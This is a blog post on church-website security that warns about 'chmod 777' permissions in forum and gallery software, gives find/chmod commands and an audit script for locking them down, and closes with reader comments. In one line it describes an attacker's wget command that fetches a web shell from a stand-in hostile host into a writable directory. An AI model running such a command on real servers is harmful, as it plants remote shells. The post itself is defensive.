Heal Your Church WebSite


Teaching, rebuking, correcting & training in righteous web design.

find -perm 777 your first ssh security stop

Want to get hacked? It’s easy: just ‘chmod 777’ everything the next time you install a BBS or photo gallery application. Don’t want to get hacked? Read on and ‘find’ how hackers see and exploit the unsecured areas of your system.

For those of you running online community applications such as phpBB, vBulletin, Coppermine Gallery, Mambo and a few others, installation can be a breeze if you have shell access. That said, installations can also lead to an unwanted visit if you get sloppy with your file permissions during the install.

For today’s example I’ll pick on vBulletin because it is a commercial product, but be warned: the topic equally applies to a host of ‘open sores’ applications as well.

The ne’er-do-well runs a Google search for those websites that are ‘Powered by: vBulletin Version 3.0.x.’ Upon finding a potential victim, they visit the site and … pay attention now … through their browser request a URL on your system that contains a remote command. That first remote command is likely to include “find -perm 777”, giving the hakr all the information he needs to then “wget http://myhakrhost.ru/myshell.php -O /your/unsecure/directory/logon.php” onto your system. Once that happens, there is nothing left but to wipe your system clean and pray your backups are recent and reliable (more on that topic another time).

So two things I ask of you.

  1. Keep your online applications up-to-date – get on their mailing list to keep abreast of changes, updates and patches.
  2. For those of you with shell access to your system, run file permission scans such as ‘find -perm 777’ on your system before someone less trustworthy does. You might be disturbed by what you ‘find.’

For those of you whose paranoia-meter just went off the scale, here is a command that, for now, will lock down those open areas:

find . -perm 777 -exec chmod 755 {} \;

For those of you with root access:

find / -perm 777 -type d

You may also want to run a scan for programs that provide web-based shell access. You’ll be glad you did.
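As an added example (not from the original post), here is a small POSIX shell script that takes the ‘find -perm 777’ idea a step further. It scans with -perm -002 rather than -perm 777, because -perm 777 matches only a mode of exactly 777 and silently misses a 666 config file or a 767 upload directory, both of which the whole world can write to. The function names (scan_world_writable, count_world_writable, fix_world_writable) and the sample directory tree are mine, constructed for the demo.

```shell
#!/bin/sh
# Added example, not from the original post: audit and repair world-writable
# paths under a web root. "-perm -002" means "the other-write bit is set",
# so it catches 777, 666, 767 and friends, not just exactly 777.

# List world-writable files and directories below $1, one path per line.
# Symlinks are skipped on purpose: their own mode reads as 777 on Linux, and
# chmod on one would change the target instead. -xdev stays on one filesystem.
scan_world_writable() {
    find "$1" -xdev -perm -002 \( -type f -o -type d \) -print
}

# Count world-writable entries below $1 (handy for a cron-driven check).
count_world_writable() {
    scan_world_writable "$1" | wc -l | tr -d ' '
}

# Strip only the "other" write bit from everything the scan reports.
# 666 becomes 664, 777 becomes 775; group and owner bits are left alone,
# which is gentler than the blanket chmod 755 in the post.
fix_world_writable() {
    find "$1" -xdev -perm -002 \( -type f -o -type d \) -exec chmod o-w {} +
}

# Demo on a constructed tree (sample data, not a real site).
demo() {
    root=$(mktemp -d)
    mkdir -p "$root/uploads" "$root/includes"
    : > "$root/index.php";        chmod 644 "$root/index.php"
    : > "$root/config.php";       chmod 666 "$root/config.php"    # world-writable file
    : > "$root/includes/lib.php"; chmod 755 "$root/includes/lib.php"
    chmod 777 "$root/uploads"                                      # world-writable dir
    echo "before: $(count_world_writable "$root") world-writable path(s)"
    scan_world_writable "$root"
    fix_world_writable "$root"
    echo "after:  $(count_world_writable "$root") world-writable path(s)"
    rm -rf "$root"
}

if [ "${1:-}" = "demo" ]; then
    demo
fi
```

Run it as `sh audit.sh demo` to see the before/after counts on the sample tree, or source it and point scan_world_writable at your real document root. Run the scan first and read the list before calling fix_world_writable: a gallery or forum that genuinely needs a world-writable upload directory will break if you strip the bit, and that is the moment to look for a better-designed application, as the first commenter below suggests.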

6 Comments

  1. I *always* seriously re-evaluate the use of any web application that has me 777 any file — directories are another matter, as we all know, but when they tell me to apply it to a file instead of 666 or 755, I usually go looking for another solution for my needs.

  2. Forgive my lack of understanding here, but I’m not sure what you mean by ‘request a URL on your system that contains a remote command.’ Does this mean that a specific file contains a security flaw allowing a remote command to be executed? Or, are you saying that by having any file marked 777 the system can be compromised?

  3. This is pretty common with WordPress, since it lets you edit the templates online, but only if they’re writable. What would you suggest? The files that need to be editable are .php and .css files.

  4. IMHO… The danger of using 777 permissions really only matters if other users have access to your directories. In any case, most hosts (or any decent host) use vhosts, making access to files/directories, through ssh, telnet or ftp, impossible.

  5. Individual files need only a CHMOD of 666 to be write-able. 777 gives global writing AND execution to them.

  6. Pfft, I had just read this and was thinking “Hmm, I should do this” about 2 days ago. I of course had not done it yet, as I still haven’t set up the shell access on the church’s website (need to fax in my ID).

    ANYWAYS…

    Last night, just a few hours after I checked up on the website… we got hacked. Just a simple defacement. They managed to change the index.php somehow and I’m not even sure how they managed it, since I only had permissions set to owner read/write and group read/write (the only group is me)…

    Sort of an odd feeling to have it done to me. I’m no expert, but I had falsely thought I had the site locked down fairly well. :( Guess it’s a good thing I’m planning out version 2 of the site right now.

    If any of you would like to take a look at the site and help me out, please do, because I am thoroughly confused as to how they worked it.

    BTW, the bragging site for the hacker:
    http://www.zone-h.org/en/defacements/view/id=2716715/